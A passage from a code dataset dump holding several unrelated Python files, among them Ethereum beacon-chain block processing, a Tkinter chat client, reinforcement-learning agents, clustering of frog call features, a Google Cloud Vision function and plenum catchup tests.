f\"The block ({block}) has too many proposer slashings:\\n\"\n f\"\\tFound {len(block.body.proposer_slashings)} proposer slashings, \"\n f\"maximum: {config.MAX_PROPOSER_SLASHINGS}\"\n )\n\n for proposer_slashing in block.body.proposer_slashings:\n validate_proposer_slashing(state, proposer_slashing, config.SLOTS_PER_EPOCH)\n\n state = slash_validator(\n state=state,\n index=proposer_slashing.proposer_index,\n latest_slashed_exit_length=config.LATEST_SLASHED_EXIT_LENGTH,\n whistleblower_reward_quotient=config.WHISTLEBLOWER_REWARD_QUOTIENT,\n max_deposit_amount=config.MAX_DEPOSIT_AMOUNT,\n committee_config=CommitteeConfig(config),\n )\n\n return state\n\n\n@to_tuple\ndef _get_slashable_indices(state: BeaconState,\n config: BeaconConfig,\n attester_slashing: AttesterSlashing) -> Iterable[ValidatorIndex]:\n for index in attester_slashing.slashable_attestation_1.validator_indices:\n should_be_slashed = (\n index in attester_slashing.slashable_attestation_2.validator_indices and\n not state.validator_registry[index].slashed\n )\n if should_be_slashed:\n yield index\n\n\ndef process_attester_slashings(state: BeaconState,\n block: BaseBeaconBlock,\n config: BeaconConfig) -> BeaconState:\n if len(block.body.attester_slashings) > config.MAX_ATTESTER_SLASHINGS:\n raise ValidationError(\n f\"The block ({block}) has too many attester slashings:\\n\"\n f\"\\tFound {len(block.body.attester_slashings)} attester slashings, \"\n f\"maximum: {config.MAX_ATTESTER_SLASHINGS}\"\n )\n\n for attester_slashing in block.body.attester_slashings:\n validate_attester_slashing(\n state,\n attester_slashing,\n config.MAX_INDICES_PER_SLASHABLE_VOTE,\n config.SLOTS_PER_EPOCH,\n )\n\n slashable_indices = _get_slashable_indices(state, config, attester_slashing)\n\n validate_slashable_indices(slashable_indices)\n for index in slashable_indices:\n state = slash_validator(\n state=state,\n index=index,\n latest_slashed_exit_length=config.LATEST_SLASHED_EXIT_LENGTH,\n whistleblower_reward_quotient=config.WHISTLEBLOWER_REWARD_QUOTIENT,\n max_deposit_amount=config.MAX_DEPOSIT_AMOUNT,\n committee_config=CommitteeConfig(config),\n )\n\n return state\n\n\ndef process_attestations(state: BeaconState,\n block: BaseBeaconBlock,\n config: BeaconConfig) -> BeaconState:\n \"\"\"\n Implements 'per-block-processing.operations.attestations' portion of Phase 0 spec:\n https://github.com/ethereum/eth2.0-specs/blob/master/specs/core/0_beacon-chain.md#attestations-1\n\n Validate the ``attestations`` contained within the ``block`` in the context of ``state``.\n If any invalid, throw ``ValidationError``.\n Otherwise, append a ``PendingAttestationRecords`` for each to ``previous_epoch_attestations``\n or ``current_epoch_attestations``.\n Return resulting ``state``.\n \"\"\"\n if len(block.body.attestations) > config.MAX_ATTESTATIONS:\n raise ValidationError(\n f\"The block ({block}) has too many attestations:\\n\"\n f\"\\tFound {len(block.body.attestations)} attestations, \"\n f\"maximum: {config.MAX_ATTESTATIONS}\"\n )\n\n for attestation in block.body.attestations:\n validate_attestation(\n state,\n attestation,\n config.MIN_ATTESTATION_INCLUSION_DELAY,\n config.LATEST_BLOCK_ROOTS_LENGTH,\n CommitteeConfig(config),\n )\n\n # update attestations\n previous_epoch = state.previous_epoch(config.SLOTS_PER_EPOCH, config.GENESIS_EPOCH)\n current_epoch = state.current_epoch(config.SLOTS_PER_EPOCH)\n new_previous_epoch_pending_attestations = []\n new_current_epoch_pending_attestations = []\n for attestation in block.body.attestations:\n if 
slot_to_epoch(attestation.data.slot, config.SLOTS_PER_EPOCH) == current_epoch:\n new_current_epoch_pending_attestations.append(\n PendingAttestationRecord(\n data=attestation.data,\n aggregation_bitfield=attestation.aggregation_bitfield,\n custody_bitfield=attestation.custody_bitfield,\n slot_included=state.slot,\n )\n )\n elif slot_to_epoch(attestation.data.slot, config.SLOTS_PER_EPOCH) == previous_epoch:\n new_previous_epoch_pending_attestations.append(\n PendingAttestationRecord(\n data=attestation.data,\n aggregation_bitfield=attestation.aggregation_bitfield,\n custody_bitfield=attestation.custody_bitfield,\n slot_included=state.slot,\n )\n )\n\n state = state.copy(\n previous_epoch_attestations=(\n state.previous_epoch_attestations + tuple(new_previous_epoch_pending_attestations)\n ),\n current_epoch_attestations=(\n state.current_epoch_attestations + tuple(new_current_epoch_pending_attestations)\n ),\n )\n return state\n\n\ndef process_voluntary_exits(state: BeaconState,\n block: BaseBeaconBlock,\n config: BeaconConfig) -> BeaconState:\n if len(block.body.voluntary_exits) > config.MAX_VOLUNTARY_EXITS:\n raise ValidationError(\n f\"The block ({block}) has too many voluntary exits:\\n\"\n f\"\\tFound {len(block.body.voluntary_exits)} voluntary exits, \"\n f\"maximum: {config.MAX_VOLUNTARY_EXITS}\"\n )\n\n for voluntary_exit in block.body.voluntary_exits:\n validate_voluntary_exit(\n state,\n voluntary_exit,\n config.SLOTS_PER_EPOCH,\n config.PERSISTENT_COMMITTEE_PERIOD,\n )\n # Run the exit\n state = initiate_validator_exit(state, voluntary_exit.validator_index)\n\n return state\n","sub_path":"eth2/beacon/state_machines/forks/serenity/operation_processing.py","file_name":"operation_processing.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"309678981","text":"from tkinter import *\nfrom tkinter import messagebox \nimport socket\nfrom threading import Thread\n\nhostname = socket.gethostname()\nip = socket.gethostbyname(hostname)\nBUFSIZ = 1024\nclient_socket = None\nreceive_thread = None\nmessage = None\n\n# Disconnect From the server\ndef Disconnect():\n if(client_socket):\n client_socket.close()\n ConnectButton.configure(text = \"Connect\", command=Connect)\n sendButton.configure(state=\"disabled\")\n uname.configure(state=\"normal\")\n\n# Connect to Remote\ndef Connect():\n global client_socket\n global receive_thread\n\n try:\n # Assign resusable socket\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n ADDR = (remote_ip.get(), int(remote_port.get()))\n print(\"Server Address: \",ADDR)\n # Attempt connection to server\n client_socket.connect(ADDR)\n receive_thread = Thread(target=RecvMessage)\n receive_thread.start()\n # Change Buttons and entry states\n ConnectButton.configure(text = \"Disconnect\", command=Disconnect)\n sendButton.configure(state=\"normal\")\n uname.configure(state=\"disabled\")\n # Announce to server that you have joined\n client_socket.sendall((uname.get() + \" has joined the server\" ).encode('utf-8'))\n except OSError as ex: # Server Declines Connection\n # print(\"Error: \",ex)\n print(\"Connection to Server failed\")\n except ValueError:\n print(\"Port should be a valid number\")\n\n# Receive Function\ndef RecvMessage():\n # loop that waits for messages\n while True:\n try:\n msg = client_socket.recv(BUFSIZ).decode(\"utf8\")\n msg_list.insert(END, msg)\n except OSError: # 
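One caveat worth keeping in mind for the chat client's receive loop: TCP is a byte stream, so a single `recv(BUFSIZ)` is not guaranteed to correspond to exactly one `send()` from the server. A common remedy is to delimit messages, e.g. by newline; a hedged sketch, not part of the original file:

```python
def recv_lines(sock, bufsiz=1024):
    """Yield one newline-terminated message at a time from a stream socket."""
    buffer = ""
    while True:
        chunk = sock.recv(bufsiz).decode("utf8")
        if not chunk:       # peer closed the connection
            return
        buffer += chunk
        while "\n" in buffer:
            line, buffer = buffer.split("\n", 1)
            yield line
```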
Possibly client has left the chat.\n print(\"You have been disconnected from the server\")\n Disconnect()\n break\n \n\n# Send Function\ndef SendMessage():\n msg = message.get(\"1.0\",END) # Retrives data from input field.\n message.delete(\"1.0\",END) # Clears input field.\n client_socket.send(bytes(uname.get() + \": \" + msg, \"utf8\")) # Send message\n\n\n\n\n\n# Function called on exit to terminate running threads and close sockets\ndef on_closing():\n if messagebox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n if(client_socket):\n client_socket.close()\n if(receive_thread and receive_thread.is_alive()):\n receive_thread.join()\n mainWindow.destroy()\n# GUI\nmainWindow = Tk()\nmainWindow.title('Chat Application - Client')\n\nconfigFrame = Frame(mainWindow)\n# Set IP and Port along with username\nLabel(configFrame, text='IP Address').grid(row=0,column=0)\nLabel(configFrame, text='Name').grid(row=0,column=2)\nuname = Entry(configFrame,state=\"normal\")\nuname.grid(row=0,column=3)\nuname.insert(END,\"User\")\nLabel(configFrame, text='Port').grid(row=1)\nremote_ip = Entry(configFrame)\nremote_ip.insert(END, '127.0.0.1')\nremote_ip.grid(row=0, column=1)\nremote_port = Entry(configFrame)\nremote_port.insert(END, '8008')\nremote_port.grid(row=1, column=1)\n\nConnectButton = Button(configFrame, text='Connect', width=25, command=Connect)\nConnectButton.grid(row=1,column=2)\n\n# Show Current IP and Hostname\nLabel(configFrame, text=\"My IP: \").grid(row=2,column = 0)\nLabel(configFrame, text=ip).grid(row=2,column = 1)\nLabel(configFrame, text=\"My Hostname: \").grid(row=3,column = 0)\nLabel(configFrame, text=hostname).grid(row=3,column = 1)\n\nconfigFrame.grid(row=0)\n\n# Message Receive Box\nmessagesFrame = Frame(mainWindow)\nscrollbar = Scrollbar(messagesFrame) # To navigate through previous messages.\n# Following will contain the messages.\nmsg_list = Listbox(messagesFrame, height=15, width=50, bg=\"silver\",yscrollcommand=scrollbar.set)\nmsg_list.insert(0, \"- - - - - - Beginning of Chat - - - - - - -\")\nscrollbar.pack(side=RIGHT, fill=Y)\nmsg_list.pack(side=LEFT, fill=BOTH)\nmsg_list.pack()\nmessagesFrame.grid(row=4)\n\n# Send Message Box\nSendFrame = Frame(mainWindow)\nmessage = Text(SendFrame,height=4)\nmessage.grid(row=6,column=0)\nsendButton = Button(SendFrame, text='Send Message', width=20, command=SendMessage,state='disabled')\nsendButton.grid(row=6,column=1)\nSendFrame.grid(row=5)\n\nmainWindow.protocol(\"WM_DELETE_WINDOW\", on_closing)\nmainWindow.mainloop()","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"208013432","text":" #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis module contain reinforcement learning agents for various experimental tasks\nCreated on Mon Jan 21 13:50:01 2019\n\n@author: Dimitrije Markovic\n\"\"\"\n\nimport torch\nfrom torch import ones, zeros, arange\nfrom torch.distributions import Categorical\n\nfrom .agent import Discrete\n\n__all__ = [\n 'RLSocInf',\n 'RLTempRevLearn'\n]\n\nclass RLSocInf(Discrete):\n \n def __init__(self, runs=1, blocks=1, trials=1):\n \n na = 2 # number of actions\n ns = 2 # number of states\n no = 2 # number of outcomes\n super(RLSocInf, self).__init__(runs, blocks, trials, na, ns, no)\n \n def set_parameters(self, x=None):\n \n if x is not None:\n self.alpha = x[..., 0].sigmoid()\n self.zeta = x[..., 1].sigmoid()\n self.beta = x[..., 2].exp()\n self.bias = x[..., 3]\n 
else:\n            self.alpha = .25*ones(self.runs)\n            self.zeta = .95*ones(self.runs)\n            self.beta = 10.*ones(self.runs)\n            self.bias = zeros(self.runs)  # bias is used in planning(), so it needs a default as well\n\n        self.V0 = zeros(self.runs)\n        self.npar = 4\n\n        # set initial value vector\n        self.values = [self.V0]\n        self.offers = []\n        self.logits = []\n    \n    def update_beliefs(self, b, t, response_outcomes, mask=None):\n        \n        if mask is None:\n            mask = ones(self.runs) \n        \n        V = self.values[-1]\n        o = response_outcomes[-1][:, -2]\n        \n        # update choice values\n        self.values.append(V + mask*self.alpha*(o - V))\n\n    def planning(self, b, t, offers):\n        \"\"\"Compute response probability from values.\"\"\"\n        V = self.values[-1]\n        b_soc = (1 + V)/2\n        b_vis = offers\n        b_int = b_soc * self.zeta + b_vis * (1 - self.zeta)\n        ln = b_int.log() - (1 - b_int).log()\n        \n        logits = self.beta * ln + self.bias\n        logits = torch.stack([-logits, logits], -1)\n        self.logits.append(logits) \n\n    def sample_responses(self, b, t):\n        cat = Categorical(logits=self.logits[-1])\n        \n        return cat.sample()\n    \nclass RLTempRevLearn(Discrete):\n    \"\"\"here we implement a reinforcement learning agent for the temporal \n    reversal learning task. \n    \"\"\"\n    \n    def __init__(self, runs=1, blocks=1, trials=1):\n        \n        na = 3 # number of actions\n        ns = 2 # number of states\n        no = 4 # number of outcomes\n        super(RLTempRevLearn, self).__init__(runs, blocks, trials, na, ns, no)\n    \n    def set_parameters(self, x=None, set_variables=True):\n        \n        if x is not None:\n            self.alpha = x[..., 0].sigmoid()\n            self.kappa = x[..., 1].sigmoid()\n            self.beta = x[..., 2].exp()\n            self.bias = x[..., 3]\n        else:\n            self.alpha = .25*ones(self.runs)\n            self.kappa = ones(self.runs)\n            self.beta = 10.*ones(self.runs)\n            self.bias = zeros(self.runs)\n        \n        if set_variables:\n            self.V0 = zeros(self.runs, self.na)\n            self.V0[:, -1] = self.bias\n            self.npar = 4\n            \n            # set initial value vector\n            self.values = [self.V0]\n            self.offers = []\n            self.outcomes = []\n            self.logits = []\n        \n    def update_beliefs(self, b, t, response_outcome, mask=None):\n        \n        if mask is None:\n            mask = ones(self.runs)\n        \n        V = self.values[-1]\n        \n        res = response_outcome[0]\n        obs = response_outcome[1]\n        \n        hints = res == 2\n        nothints = ~hints\n        lista = arange(self.runs)\n        \n        # update choice values\n        V_new = zeros(self.runs, self.na)\n        V_new[:, -1] = self.bias\n        \n        if torch.get_default_dtype() == torch.float32:\n            rew = 2.*obs[nothints].float() - 1.\n        else:\n            rew = 2.*obs[nothints].double() - 1.\n        \n        choices = res[nothints]\n        l = lista[nothints]\n        V1 = V[l, choices]\n        V_new[l, choices] = V1 + self.alpha[nothints] * mask[nothints] * (rew - V1)\n        \n        V2 = V[l, 1 - choices]\n        V_new[l, 1 - choices] = V2 - \\\n            self.alpha[nothints] * self.kappa[nothints] * mask[nothints] * (rew + V2)\n        \n        cue = obs[hints] - 2\n        V_new[hints, cue] = 1.\n        V_new[hints, 1 - cue] = - self.kappa[hints]\n        self.values.append(V_new)\n\n    def planning(self, b, t, offers):\n        \"\"\"Compute response probability from stimuli values for the given offers.\n        Here offers encode location of stimuli A and B.\n        \"\"\"\n        self.offers.append(offers)\n        loc1 = offers == 0\n        loc2 = ~loc1\n        \n        V = zeros(self.runs, self.na)\n        V[loc1] = self.values[-1][loc1]\n        if loc2.any():\n            V[loc2, 0] = self.values[-1][loc2, 1]\n            V[loc2, 1] = self.values[-1][loc2, 0]\n            V[loc2, -1] = self.values[-1][loc2, -1]\n        \n        self.logits.append(self.beta.reshape(-1, 1) * V) \n\n    def sample_responses(self, b, t):\n        logits = self.logits[-1]\n        cat = Categorical(logits=logits)\n        \n        return 
cat.sample()","sub_path":"agents/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"556285697","text":"import re\nimport urllib\nfrom slugify import slugify\n\nEVENT_ID_REGEX = r'(?:\\d+|[^/?#]+:[^/?#]+)'\n\n\ndef dd_event_url(eid, kwargs=None):\n kwarg_string = '?%s' % urlencode(kwargs) if kwargs else ''\n return 'https://www.dancedeets.com%s%s' % (dd_relative_event_url(eid), kwarg_string)\n\n\ndef dd_relative_event_url(eid):\n if isinstance(eid, basestring):\n return '/events/%s/' % eid\n else:\n event = eid\n slug = slugify(unicode(event.name))\n return '/events/%s/%s' % (event.id, slug)\n\n\ndef dd_short_event_url(eid):\n return 'https://dd.events/e-%s' % eid\n\n\ndef raw_fb_event_url(eid):\n return 'https://www.facebook.com/events/%s/' % eid\n\n\ndef dd_admin_event_url(eid):\n return 'https://www.dancedeets.com/events/admin_edit?event_id=%s' % eid\n\n\ndef dd_admin_source_url(eid):\n return 'https://www.dancedeets.com/sources/admin_edit?source_id=%s' % eid\n\n\ndef event_image_url(eid, **kwargs):\n encoded_kwargs = urlencode(kwargs)\n url = 'https://flyers.dancedeets.com/%s' % eid\n if encoded_kwargs:\n return '%s?%s' % (url, encoded_kwargs)\n else:\n return url\n\n\ndef dd_search_url(location, keywords=''):\n return 'https://www.dancedeets.com/?' + urlencode({\n 'location': location,\n 'keywords': keywords,\n })\n\n\ndef urlencode(kwargs, doseq=False):\n if doseq:\n new_kwargs = {}\n for k, v in kwargs.iteritems():\n new_kwargs[unicode(k).encode('utf-8')] = [unicode(v_x).encode('utf-8') for v_x in v]\n kwargs = new_kwargs\n else:\n kwargs = dict((unicode(k).encode('utf-8'), unicode(v).encode('utf-8')) for (k, v) in kwargs.iteritems())\n return urllib.urlencode(kwargs, doseq=doseq)\n\n\ndef get_event_id_from_url(url):\n if '#' in url:\n url = url.split('#')[1]\n match = re.search(r'eid=(\\d+)', url)\n if not match:\n match = re.search(r'/events/(%s)(?:[/?]|$)' % EVENT_ID_REGEX, url)\n if not match:\n match = re.search(r'event_id=(%s)(?:[/?]|$)' % EVENT_ID_REGEX, url)\n if not match:\n return None\n return match.group(1)\n","sub_path":"server/dancedeets/util/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"23206630","text":"\nfrom ursina import *\napp = Ursina()\n\nsnake = Entity(model='cube', texture = 'assets\\snake', scale=0.4, z=-1, collider='box')\nground = Entity(model='cube', texture='grass',rotation=(90,0,0),scale=(5,1,5), z=1)\napple = Entity(model='cube', texture='assets\\\\apple', scale=0.4, position=(1,-1,-1), collider='mesh')\nbody = [Entity(model='cube', scale =0.2, texture='assets\\\\body') for i in range(14)]\n\ncamera.orthographic = True\ncamera.fov = 8\n\nfrom random import randint\ndx = dy = 0\ndef update():\n info = snake.intersects()\n if info.hit:\n apple.x = randint(-4,4)/2\n apple.y = randint(-4,4)/2\n new = Entity(model='cube', z = -1, scale=0.2, texture='assets\\\\body')\n body.append(new)\n for i in range(len(body)-1,0,-1):\n pos = body[i-1].position\n body[i].position = pos\n body[0].x = snake.x\n body[0].y = snake.y\n snake.x += time.dt * dx\n snake.y += time.dt * dy\n\ndef input(key):\n global dx,dy\n for x,y,z in zip(['d','a'],[2,-2],[270,90]):\n if key==x:\n snake.rotation_z = z\n dx = y\n dy = 0\n for x,y,z in zip(['w','s'],[2,-2],[180,0]):\n if key == x:\n snake.rotation_z = z\n dy = y\n dx = 
0\n\napp.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"68465615","text":"import sys\nimport pandas as pd\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\nfrom sklearn.mixture import GaussianMixture\n\n# consts \n# ------------------------\n\nDEFAULT_DATA_PATH = \"./Frogs_MFCCs.csv\"\n\n# metric functions\n# --------------------------------------------\n\ndef total_sum_of_squares_df(df, centroid = None):\n \"\"\" Calculates and returns the TTS of the given DataFrame \"\"\"\n if centroid is None:\n centroid = find_centroid_df(df)\n \n return total_sum_of_squares(df.as_matrix(), centroid)\n\ndef total_sum_of_squares(data, centroid):\n \"\"\" Calculates and returns the TTS of the given matrix\n \n Arguments:\n data - Iterable\n centroid - Array\n \"\"\" \n total = 0\n \n for row in data:\n for index, value in enumerate(row):\n diff = value - centroid[index]\n diffsq = diff * diff\n total += diffsq\n \n return total\n\n\ndef find_centroid_df(df):\n \"\"\" Calculates and returns the centroid for a DataFrame \"\"\"\n return df.mean()\n\n# clustering functions\n# --------------------------\n\ndef get_cluster_indexes(assignments):\n cluster_slices = {}\n \n for index, assignment in enumerate(assignments):\n if assignment not in cluster_slices:\n cluster_slices[assignment] = list()\n \n cluster_slices[assignment].append(index)\n \n return cluster_slices\n\ndef get_cluster_data(df, assignments):\n cluster_indexes = get_cluster_indexes(assignments)\n \n cluster_data = {k: df.iloc[v] for k, v in cluster_indexes.items()}\n \n return cluster_data\n\ndef get_clusters(df, assignments):\n \"\"\"Returns an array of tuples with (, , )\"\"\"\n \n return [\n (cluster, find_centroid_df(cluster_data), cluster_data) \n for cluster, cluster_data \n in get_cluster_data(df, assignments).items()\n ]\n \n\n# model runners\n# ------------------------------------------\n\ndef run_gaussian_mixture(model, data):\n model.fit(data)\n return model.predict(data)\n\ndef run_kmeans(model, data):\n model.fit(data)\n return model.predict(data)\n\ndef run_hclustering(model, data):\n return model.fit_predict(data)\n\n# data functions \n# -------------------------------------------\n\ndef clean_data(data):\n # Strip whitespaces from all string values\n # and replace \"?\" with None,\n # and drop all na rows\n data = data.apply(lambda x: x.str.strip() if x.dtype == \"object\" else x) \\\n .replace([\"?\"], [None]) \\\n .dropna()\n\n data = data.iloc[:,2:22]\n return data\n\ndef prepare_data(data):\n return data\n\ndef read_data(path):\n dataset = pd.read_csv(path)\n dataset = clean_data(dataset)\n dataset = prepare_data(dataset)\n return dataset\n\n# main\n# -----------------------------------------\n\ndef main():\n data_path = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_DATA_PATH\n\n print(\"Reading data from: %s\" % data_path) \n df = read_data(data_path)\n\n print(\"Calculating tss...\")\n tss = total_sum_of_squares_df(df)\n print(\"tss = %s\" % tss)\n print(\"\")\n\n models = [\n (\"KMeans\", lambda k: KMeans(n_clusters=k), run_kmeans),\n (\"H-Clustering\", lambda k: AgglomerativeClustering(n_clusters=k), run_hclustering),\n (\"Gaussian Mixture\", lambda k: GaussianMixture(n_components=k, reg_covar=0.001), run_gaussian_mixture)\n ]\n\n for model_name, create_model, run_model in models:\n 
print(\"-------------------------------\")\n print(model_name)\n print(\"-------------------------------\")\n print(\"\")\n for k in range(1,11):\n print(\"Calculating %s clusters...\" % k)\n print(\"\")\n model = create_model(k)\n assignments = run_model(model, df)\n clusters = get_clusters(df, assignments)\n\n twss = 0\n for cluster, centroid, cluster_slice in clusters:\n cluster_tss = total_sum_of_squares_df(cluster_slice, centroid)\n print(\"cluster %s | tss = %s | size = %s\" % (cluster, cluster_tss, len(cluster_slice)))\n twss += cluster_tss\n\n print(\"twss/tss = %s/%s = %s\" % (twss, tss, twss / tss))\n print(\"\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Anuran_Clustering.py","file_name":"Anuran_Clustering.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"166347400","text":"class MyError(Exception):\n pass\ndef localize_objects_uri(uri,name_):\n \"\"\"Localize objects in the image on Google Cloud Storage\n\n Args:\n uri: The path to the file in Google Cloud Storage (gs://...)\n \"\"\"\n from google.cloud import vision\n from google.cloud import datastore\n \n client = vision.ImageAnnotatorClient()\n\n image = vision.types.Image()\n image.source.image_uri = uri\n\t\n objects = client.label_detection(image=image).label_annotations\n ds_client = datastore.Client()\n list1 = []\n print('Number of objects found: {}'.format(len(objects)))\n for object_ in objects:\n entity = datastore.Entity(ds_client.key('Label_Detection', name_ + \"/\" + object_.description))\n list1.append(name_)\n list1.append(object_.description)\n list1.append(object_.score)\n entity.update({\n 'FileName' : list1[0] ,\n 'LabelName' : list1[1] ,\n 'Confidence' : list1[2]\n })\n list1 = []\n \n #print('\\n{} (confidence: {})'.format(object_.description, object_.score))\n \ndef hello_gcs(event, context):\n \"\"\"Triggered by a change to a Cloud Storage bucket.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n file = event['name']\n bucket = event['bucket']\n url=\"gs://{}/{}\".format(bucket,file)\n #print(\"gs://{}/{}\".format(bucket,file))\n ext = file[-4:]\n list_=('.jpg','.png','jpeg')\n try:\n if ext not in list_:\n raise MyError\n localize_objects_uri(url,file)\n except MyError:\n print(\"Not an image!\")\n \n \n","sub_path":"q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"546392972","text":"import logging\n\nimport pytest\n\nfrom plenum.common.messages.node_messages import CatchupReq\nfrom stp_core.common.log import getlogger\nfrom plenum.test.helper import sdk_send_random_and_check\n\nlogger = getlogger()\nleger_id = 1\n\n\ndef test_receive_incorrect_catchup_request_with_end_greater_catchuptill(looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch):\n end = 15\n catchup_till = 10\n\n def _check_discard(msg, reason, logMethod=logging.error, cliOutput=False):\n assert reason.find(\"not able to service since \"\n \"end = {} greater than \"\n \"catchupTill = {}\".format(end, catchup_till))\n\n req = CatchupReq(leger_id, 0, end, catchup_till)\n _process_catchup_req(req,\n _check_discard,\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch)\n\n\ndef test_receive_incorrect_catchup_request_with_start_greater_end(looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n 
sdk_wallet_client,\n monkeypatch):\n start = 10\n end = 5\n\n def _check_discard(msg, reason, logMethod=logging.error, cliOutput=False):\n assert reason.find(\"not able to service since \"\n \"start = {} greater than \"\n \"end = {}\"\n .format(start, end))\n\n req = CatchupReq(leger_id, start, end, 11)\n _process_catchup_req(req,\n _check_discard,\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch)\n\n\ndef test_receive_incorrect_catchup_request_with_catchuptill_greater_ledger_size(\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch):\n catchup_till = 100\n req = CatchupReq(leger_id, 0, 10, catchup_till)\n ledger_size = txnPoolNodeSet[0].ledgerManager.getLedgerForMsg(req).size\n\n def _check_discard(msg, reason, logMethod=logging.error, cliOutput=False):\n assert reason.find(\"not able to service since \"\n \"catchupTill = {} greater than \"\n \"ledger size = {}\"\n .format(catchup_till, ledger_size))\n\n _process_catchup_req(req,\n _check_discard,\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch)\n\n\ndef _process_catchup_req(req: CatchupReq,\n check_discard,\n looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n monkeypatch):\n sdk_send_random_and_check(looper,\n txnPoolNodeSet,\n sdk_pool_handle,\n sdk_wallet_client,\n 4)\n ledger_manager = txnPoolNodeSet[0].ledgerManager\n monkeypatch.setattr(ledger_manager.owner, 'discard', check_discard)\n ledger_manager.processCatchupReq(req, \"frm\")\n","sub_path":"plenum/test/node_catchup/test_incorrect_catchup_request.py","file_name":"test_incorrect_catchup_request.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"467007389","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 03 17:05:01 2014\n\n@author: Sarthak Khanna\n\"\"\"\n\n\nd = raw_input()\nd = str(d)\n\nn = raw_input()\nn = int(n)\nx=[]\ny=[]\nl = len(d)\ni = 0\nfor i in range(n):\n a,b = raw_input().split()\n a = int(a)\n x.append(a) \n b = int(b)\n y.append(b)\n \n\nfor i in range(n):\n c = x[i]%l\n c = int(c)\n \n e = y[i]%l\n e = int(e)\n \n if (str(d[c-1])==str(d[e-1])):\n print('Yes')\n else:\n print('No')","sub_path":"5.Girlfriend's demands.py","file_name":"5.Girlfriend's demands.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"366442145","text":"# -*- coding: utf-8 -*-\n\nimport os\n\nfrom os.path import dirname, join\nfrom setuptools import setup, find_packages, Command\n\n# Hack because logging + setuptools sucks.\nimport multiprocessing\n\n\ndef fread(fn):\n with open(join(dirname(__file__), fn), 'r') as f:\n return f.read()\n\ntests_require = ['nose', 'unittest2', 'pycrypto']\n\nsetup(\n name='oauthlib',\n version='0.0.2',\n description='A generic, spec-compliant, thorough implementation of the OAuth request-signing logic',\n long_description=fread('README.rst'),\n author='Idan Gazit',\n author_email='idan@gazit.me',\n url='https://github.com/idangazit/oauthlib',\n license=fread('LICENSE'),\n packages=find_packages(exclude=('tests', 'docs')),\n test_suite='nose.collector',\n tests_require=tests_require,\n extras_require={'test': tests_require},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"54746247","text":"# 
Problem 1\ndef merge(a, b, N, letter_indices):\n    # Initialise indices\n    i = 0\n    j = 0\n    merged_list = []\n\n\n    while i < len(a):\n        if j >= len(b) or a[i] <= b[j]:\n            merged_list.append(a[i])\n            N[letter_indices[a[i]]] += j\n            i += 1\n        else:\n            merged_list.append(b[j])\n            j += 1\n\n    if i == len(a):\n        return merged_list + b[j:]\n    else:\n        return merged_list\n\n\ndef rank_right(l):\n    \"\"\"\n    Returns, for each index, the number of items after it whose value is lower than the item at that index\n\n    Note: N is a single shared instance - when the merge function updates it, it is automatically\n    updated here as well.\n    Letter_indices represents each letter's index in the N list.\n    \"\"\"\n    N = [0] * len(l)\n    letter_indices = {number: index for (index, number) in enumerate(l)}\n\n    def iteration(l, N, letter_indices):\n        # Handle single-element lists\n        if len(l) <= 1:\n            return l\n\n        # Handle larger lists\n        mid = len(l) // 2\n        first_chunk = iteration(l[:mid], N, letter_indices)\n        second_chunk = iteration(l[mid:], N, letter_indices)\n        result = merge(first_chunk, second_chunk, N, letter_indices)\n        return result\n\n    # Note: we don't care about the return value here - N is updated automatically\n    iteration(l, N, letter_indices)\n\n    return N\n\n\n# Tests\nassert rank_right([3, 6, 5, 4, 2, 8, 1, 0, 7, 9]) == [3, 5, 4, 3, 2, 3, 1, 0, 0, 0]\nassert rank_right([2, 6, 1, 3, 5, 0, 4]) == [2, 5, 1, 1, 2, 0, 0]\nassert rank_right([3, 1, 7, 0, 6, 5, 2, 4, 9, 8]) == [3, 1, 5, 0, 3, 2, 0, 